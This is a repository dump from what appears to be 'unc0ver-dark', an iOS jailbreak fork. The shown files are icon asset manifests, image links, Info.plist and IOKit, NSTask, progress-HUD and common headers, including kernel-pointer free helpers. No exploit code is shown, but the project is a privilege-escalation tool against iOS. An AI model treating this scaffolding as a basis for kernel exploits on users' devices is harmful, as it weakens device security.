108 | "filename" : "Icon-App-83.5x83.5@2x.png",
109 | "scale" : "2x"
110 | },
111 | {
112 | "size" : "1024x1024",
113 | "idiom" : "ios-marketing",
114 | "filename" : "Icon-App-1024x1024.png",
115 | "scale" : "1x"
116 | }
117 | ],
118 | "info" : {
119 | "version" : 1,
120 | "author" : "xcode"
121 | }
122 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-1024x1024.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-1024x1024.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "version" : 1,
4 | "author" : "xcode"
5 | }
6 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "maintenance.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "maintenance@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "maintenance@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/maintenance.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/maintenance.imageset/maintenance.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/meridian.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/meridian.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/meridian.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/picker.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/picker.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/picker.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/purple.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/purple.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/purple.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "settings.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "settings@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "settings@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/settings.imageset/settings.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/settings@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/settings.imageset/settings@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/settings@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/settings.imageset/settings@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/white.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/white.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/white.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Undecimus/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleDisplayName
8 | unc0ver dark
9 | CFBundleExecutable
10 | $(EXECUTABLE_NAME)
11 | CFBundleIcons
12 |
13 | CFBundleAlternateIcons
14 |
15 | DarkMeridianIcon
16 |
17 | CFBundleIconFiles
18 |
19 | darkmeridian
20 |
21 | UIPrerenderedIcon
22 |
23 |
24 | MeridianIcon
25 |
26 | CFBundleIconFiles
27 |
28 | meridian
29 |
30 | UIPrerenderedIcon
31 |
32 |
33 | PurpleIcon
34 |
35 | CFBundleIconFiles
36 |
37 | purple
38 |
39 | UIPrerenderedIcon
40 |
41 |
42 | WhiteIcon
43 |
44 | CFBundleIconFiles
45 |
46 | white
47 |
48 | UIPrerenderedIcon
49 |
50 |
51 |
52 | CFBundlePrimaryIcon
53 |
54 | CFBundleIconFiles
55 |
56 | AppIcon60x60
57 |
58 | UIPrerenderedIcon
59 |
60 |
61 |
62 | CFBundleIdentifier
63 | $(PRODUCT_BUNDLE_IDENTIFIER)
64 | CFBundleInfoDictionaryVersion
65 | 6.0
66 | CFBundleName
67 | unc0ver-dark
68 | CFBundlePackageType
69 | APPL
70 | CFBundleShortVersionString
71 | Uno
72 | CFBundleURLTypes
73 |
74 |
75 | CFBundleTypeRole
76 | Editor
77 | CFBundleURLName
78 | $(PRODUCT_BUNDLE_IDENTIFIER)
79 | CFBundleURLSchemes
80 |
81 | unc0ver-dark
82 |
83 |
84 |
85 | CFBundleVersion
86 | 1
87 | LSApplicationQueriesSchemes
88 |
89 | tweetbot
90 | twitterrific
91 | tweetings
92 | twitter
93 |
94 | LSRequiresIPhoneOS
95 |
96 | UIFileSharingEnabled
97 |
98 | UILaunchStoryboardName
99 | LaunchScreen
100 | UIMainStoryboardFile
101 | Main
102 | UIRequiredDeviceCapabilities
103 |
104 | armv7
105 |
106 | UIStatusBarHidden
107 |
108 | UIStatusBarStyle
109 | UIStatusBarStyleLightContent
110 | UISupportedInterfaceOrientations
111 |
112 | UIInterfaceOrientationPortrait
113 |
114 | UISupportedInterfaceOrientations~ipad
115 |
116 | UIInterfaceOrientationPortrait
117 | UIInterfaceOrientationPortraitUpsideDown
118 | UIInterfaceOrientationLandscapeLeft
119 | UIInterfaceOrientationLandscapeRight
120 |
121 | UIViewControllerBasedStatusBarAppearance
122 |
123 |
124 |
125 |
--------------------------------------------------------------------------------
/Undecimus/include/IOKitLib.h:
--------------------------------------------------------------------------------
1 | /*
2 | * IOKitLib.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IOKITLIB_H_
6 | #define VOUCHER_SWAP__IOKITLIB_H_
7 |
8 | #include
9 | #include
10 | // IOKit handle types: every one of them is a Mach port name (all alias mach_port_t).
11 | typedef mach_port_t io_object_t;
12 | typedef io_object_t io_connect_t;
13 | typedef io_object_t io_iterator_t;
14 | typedef io_object_t io_service_t;
15 |
16 | extern const mach_port_t kIOMasterPortDefault;
17 | // Releases the caller's reference to an IOKit object handle.
18 | kern_return_t
19 | IOObjectRelease(
20 | io_object_t object );
21 | // Returns the next object handle from an iterator.
22 | io_object_t
23 | IOIteratorNext(
24 | io_iterator_t iterator );
25 | // 'matching' is CF_RELEASES_ARGUMENT: the call consumes one reference, so the caller must not CFRelease it again.
26 | io_service_t
27 | IOServiceGetMatchingService(
28 | mach_port_t masterPort,
29 | CFDictionaryRef matching CF_RELEASES_ARGUMENT);
30 | // Same ownership rule for 'matching'; the iterator handle is written to *existing.
31 | kern_return_t
32 | IOServiceGetMatchingServices(
33 | mach_port_t masterPort,
34 | CFDictionaryRef matching CF_RELEASES_ARGUMENT,
35 | io_iterator_t * existing );
36 | // Opens a connection to 'service' on behalf of 'owningTask'; the handle is written to *connect.
37 | kern_return_t
38 | IOServiceOpen(
39 | io_service_t service,
40 | task_port_t owningTask,
41 | uint32_t type,
42 | io_connect_t * connect );
43 | // Closes a connection handle obtained from IOServiceOpen.
44 | kern_return_t
45 | IOServiceClose(
46 | io_connect_t connect );
47 | // The counts marked In/Out hold the buffer capacity on entry and the amount produced on return; size them from the real buffers.
48 | kern_return_t
49 | IOConnectCallMethod(
50 | mach_port_t connection, // In
51 | uint32_t selector, // In
52 | const uint64_t *input, // In
53 | uint32_t inputCnt, // In
54 | const void *inputStruct, // In
55 | size_t inputStructCnt, // In
56 | uint64_t *output, // Out
57 | uint32_t *outputCnt, // In/Out
58 | void *outputStruct, // Out
59 | size_t *outputStructCnt) // In/Out
60 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;
61 | // Passes six pointer-sized arguments to the trap numbered 'index' on the connection.
62 | kern_return_t
63 | IOConnectTrap6(io_connect_t connect,
64 | uint32_t index,
65 | uintptr_t p1,
66 | uintptr_t p2,
67 | uintptr_t p3,
68 | uintptr_t p4,
69 | uintptr_t p5,
70 | uintptr_t p6);
71 | // CF_RETURNS_RETAINED: the caller owns the returned dictionary until it releases it or passes it to a CF_RELEASES_ARGUMENT parameter.
72 | CFMutableDictionaryRef
73 | IOServiceMatching(
74 | const char * name ) CF_RETURNS_RETAINED;
75 |
76 | #endif
77 |
--------------------------------------------------------------------------------
/Undecimus/include/NSTask.h:
--------------------------------------------------------------------------------
1 | /* NSTask.h
2 | Copyright (c) 1996-2017, Apple Inc. All rights reserved.
3 | */
4 |
5 | #import
6 | #import
7 |
8 | @class NSArray, NSDictionary, NSString;
9 |
10 | NS_ASSUME_NONNULL_BEGIN
11 |
12 | typedef NS_ENUM(NSInteger, NSTaskTerminationReason) {
13 | NSTaskTerminationReasonExit = 1,
14 | NSTaskTerminationReasonUncaughtSignal = 2
15 | } NS_ENUM_AVAILABLE(10_6, NA);
16 |
17 | @interface NSTask : NSObject
18 |
19 | // Create an NSTask which can be run at a later time
20 | // An NSTask can only be run once. Subsequent attempts to
21 | // run an NSTask will raise.
22 | // Upon task death a notification will be sent
23 | // { Name = NSTaskDidTerminateNotification; object = task; }
24 | //
25 |
26 | - (instancetype)init NS_DESIGNATED_INITIALIZER;
27 | // Members annotated API_UNAVAILABLE(ios, watchos, tvos) below are declared for macOS only.
28 | // these methods can only be set before a launch
29 | @property (nullable, copy) NSURL *executableURL API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
30 | @property (nullable, copy) NSArray *arguments; // each element becomes one argv entry; the strings are not shell-expanded
31 | @property (nullable, copy) NSDictionary *environment; // if not set, use current
32 | @property (nullable, copy) NSURL *currentDirectoryURL API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
33 | // Leaving 'environment' unset hands the child the launching process's whole environment.
34 | // standard I/O channels; could be either an NSFileHandle or an NSPipe
35 | @property (nullable, retain) id standardInput;
36 | @property (nullable, retain) id standardOutput;
37 | @property (nullable, retain) id standardError;
38 |
39 | // actions
40 | - (BOOL)launchAndReturnError:(out NSError **_Nullable)error API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
41 |
42 | - (void)interrupt; // Not always possible. Sends SIGINT.
43 | - (void)terminate; // Not always possible. Sends SIGTERM.
44 |
45 | - (BOOL)suspend;
46 | - (BOOL)resume;
47 |
48 | // status
49 | @property (readonly) int processIdentifier;
50 | @property (readonly, getter=isRunning) BOOL running;
51 | // terminationReason separates a normal exit from an uncaught signal (see NSTaskTerminationReason above).
52 | @property (readonly) int terminationStatus;
53 | @property (readonly) NSTaskTerminationReason terminationReason API_AVAILABLE(macos(10.6)) API_UNAVAILABLE(ios, watchos, tvos);
54 |
55 | /*
56 | A block to be invoked when the process underlying the NSTask terminates. Setting the block to nil is valid, and stops the previous block from being invoked, as long as it hasn't started in any way. The NSTask is passed as the argument to the block so the block does not have to capture, and thus retain, it. The block is copied when set. Only one termination handler block can be set at any time. The execution context in which the block is invoked is undefined. If the NSTask has already finished, the block is executed immediately/soon (not necessarily on the current thread). If a terminationHandler is set on an NSTask, the NSTaskDidTerminateNotification notification is not posted for that task. Also note that -waitUntilExit won't wait until the terminationHandler has been fully executed. You cannot use this property in a concrete subclass of NSTask which hasn't been updated to include an implementation of the storage and use of it.
57 | */
58 | @property (nullable, copy) void (^terminationHandler)(NSTask *) API_AVAILABLE(macos(10.7)) API_UNAVAILABLE(ios, watchos, tvos);
59 |
60 | @property NSQualityOfService qualityOfService API_AVAILABLE(macos(10.10), ios(8.0), watchos(2.0), tvos(9.0)); // read-only after the task is launched
61 |
62 | @end
63 |
64 | @interface NSTask (NSTaskConveniences)
65 | // Create-and-launch in one call; annotated as unavailable on iOS, watchOS and tvOS.
66 | + (nullable NSTask *)launchedTaskWithExecutableURL:(NSURL *)url arguments:(NSArray *)arguments error:(out NSError ** _Nullable)error terminationHandler:(void (^_Nullable)(NSTask *))terminationHandler API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
67 | // Blocks the caller; per the terminationHandler note in the class, it can return before that handler has finished.
68 | - (void)waitUntilExit;
69 | // poll the runLoop in defaultMode until task completes
70 |
71 | @end
72 |
73 | @interface NSTask (NSDeprecated)
74 | // Path-based launch API; unlike the URL-based members of the class, nothing in this category carries an API_UNAVAILABLE annotation.
75 | @property (nullable, copy) NSString *launchPath;
76 | @property (copy) NSString *currentDirectoryPath; // if not set, use current
77 | // launch has no error out-parameter; the class comment says a second run raises, so failures surface as exceptions, not return values.
78 | - (void)launch;
79 |
80 | + (NSTask *)launchedTaskWithLaunchPath:(NSString *)path arguments:(NSArray *)arguments;
81 | // convenience; create and launch
82 |
83 | @end
84 |
85 | FOUNDATION_EXPORT NSNotificationName const NSTaskDidTerminateNotification;
86 |
87 | NS_ASSUME_NONNULL_END
88 |
--------------------------------------------------------------------------------
/Undecimus/include/UIProgressHUD.h:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | @class UIProgressIndicator, UILabel, UIImageView, UIWindow;
4 |
5 | @interface UIProgressHUD : UIView {
6 | // Interface declaration only (a UIView subclass); argument names are generic (arg1), so their meaning comes from the selector alone.
7 | UIProgressIndicator* _progressIndicator;
8 | UILabel* _progressMessage;
9 | UIImageView* _doneView;
10 | UIWindow* _parentWindow;
11 | struct {
12 | unsigned isShowing : 1;
13 | unsigned isShowingText : 1;
14 | unsigned fixedFrame : 1;
15 | unsigned reserved : 30; // NOTE(review): the declared widths add up to 33 bits (1+1+1+30) — confirm against the real class before relying on ivar layout
16 | } _progressHUDFlags;
17 |
18 | }
19 | -(id)initWithFrame:(CGRect)arg1 ;
20 | -(void)layoutSubviews;
21 | -(void)hide;
22 | -(void)show:(bool)arg1 ;
23 | -(void)drawRect:(CGRect)arg1 ;
24 | -(void)dealloc;
25 | -(void)setText:(id)arg1 ;
26 | -(id)initWithWindow:(id)arg1 ;
27 | -(void)done;
28 | -(void)setFontSize:(int)arg1 ;
29 | -(id)_progressIndicator;
30 | -(void)setShowsText:(bool)arg1 ;
31 | -(void)showInView:(id)arg1 ;
32 | @end
33 |
34 |
--------------------------------------------------------------------------------
/Undecimus/include/common.h:
--------------------------------------------------------------------------------
1 | #ifndef COMMON_H
2 | #define COMMON_H
3 |
4 | #include // uint*_t
5 | #include
6 | #include
7 | #include
8 | #ifdef __OBJC__
9 | #include
10 | #define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false) // str is pasted after '@', so it has to be a string literal: the format string is fixed at compile time
11 | #define localize(x) NSLocalizedString(x, @"")
12 | #define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val] // ADDR is the "0x%016llx" format defined further down in this header
13 | #else
14 | #include
15 | extern void NSLog(CFStringRef, ...);
16 | #define RAWLOG(str, args...) do { NSLog(CFSTR(str), ##args); } while(false) // plain-C twin of the macro above; CFSTR likewise needs a literal
17 | #define BOOL bool
18 | #define YES ((BOOL) true)
19 | #define NO ((BOOL) false)
20 | #endif
21 | // LOG prefixes every message with "[*] " by literal concatenation; variable data belongs in args, never in str.
22 | #define LOG(str, args...) RAWLOG("[*] " str, ##args)
23 | // Free/release helpers. Each macro names its argument more than once, so pass a plain variable, not an expression with side effects.
24 | #define SafeFree(x) do { if (x) free(x); } while(false)
25 | #define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while(false) // clears the variable after freeing, so a repeated call is a no-op instead of a double free
26 | #define CFSafeRelease(x) do { if (x) CFRelease(x); } while(false) // CFRelease is only reached for a non-NULL reference
27 | #define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
28 | #define SafeSFree(x) do { if (KERN_POINTER_VALID(x)) sfree(x); } while(false) // sfree (declared elsewhere) runs only when the value passes KERN_POINTER_VALID
29 | #define SafeSFreeNULL(x) do { SafeSFree(x); (x) = KPTR_NULL; } while(false)
30 | #define SafeIOFree(x, size) do { if (KERN_POINTER_VALID(x)) IOFree(x, size); } while(false) // same guard in front of IOFree (declared elsewhere)
31 | #define SafeIOFreeNULL(x, size) do { SafeIOFree(x, size); (x) = KPTR_NULL; } while(false)
32 | // CoreFoundation version numbers for the named iOS releases; presumably compared against the runtime value — confirm at the call sites.
33 | #define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
34 | #define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23
35 | #define kCFCoreFoundationVersionNumber_iOS_11_0 1443.00
36 | // Base name of the current source file: the text after the last '/' in __FILE__, or all of __FILE__ when there is none.
37 | #define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
38 | // 64-bit Mach-O aliases and kernel-pointer helpers.
39 | #define ADDR "0x%016llx" // printf-style format for a 64-bit value, zero-padded to 16 hex digits
40 | #define MACH_HEADER_MAGIC MH_MAGIC_64
41 | #define MACH_LC_SEGMENT LC_SEGMENT_64
